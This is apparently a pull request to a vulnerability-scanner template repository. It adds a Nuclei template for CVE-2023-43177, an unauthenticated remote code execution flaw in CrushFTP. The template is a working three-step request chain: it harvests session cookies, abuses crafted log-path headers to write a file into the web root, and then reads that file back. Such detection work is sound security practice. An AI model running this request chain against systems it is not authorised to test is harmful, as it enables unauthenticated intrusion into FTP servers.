### PR TITLE
Added CVE-2023-43177 (CrushFTP < 10.5.1 RCE)

### DIFF
--- a/http/cves/2023/CVE-2023-43177.yaml
+++ b/http/cves/2023/CVE-2023-43177.yaml
@@ -38,7 +38,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - contains_any(to_lower(header), "currentauth", "crushauth")
+          - contains_all(to_lower(header), "currentauth", "crushauth")
 
   - method: POST
     path:

--- a/http/cves/2023/CVE-2023-43177.yaml
+++ b/http/cves/2023/CVE-2023-43177.yaml
@@ -1,0 +1,72 @@
+id: CVE-2023-43177
+
+info:
+  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
+    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
+    - https://blog.projectdiscovery.io/crushftp-rce/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-43177
+    cwe-id: CWE-913
+    epss-score: 0.00106
+    epss-percentile: 0.42673
+    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    vendor: crushftp
+    product: crushftp
+  tags: cve,cve2023,crushftp,unauth,rce
+
+flow: http(1) && http(2) && http(3)
+
+variables:
+  dirname: "{{randbase(5)}}"
+  filename: "{{randbase(5)}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebInterface"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_any(to_lower(header), "currentauth", "crushauth")
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
+
+    headers:
+      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
+      as2-to: X
+      user_name: crushadmin{{dirname}}
+      user_log_path: "./WebInterface/{{dirname}}/"
+      user_log_file: "{{filename}}"
+      Content-Type: application/x-www-form-urlencoded
+
+    body: |
+      post=body
+
+    matchers:
+      - type: regex
+        regex:
+          - "crushadmin"
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "crushadmin{{dirname}}")
+        condition: and


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added Added CVE-2023-43177 (CrushFTP < 10.5.1 RCE)
- References:
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)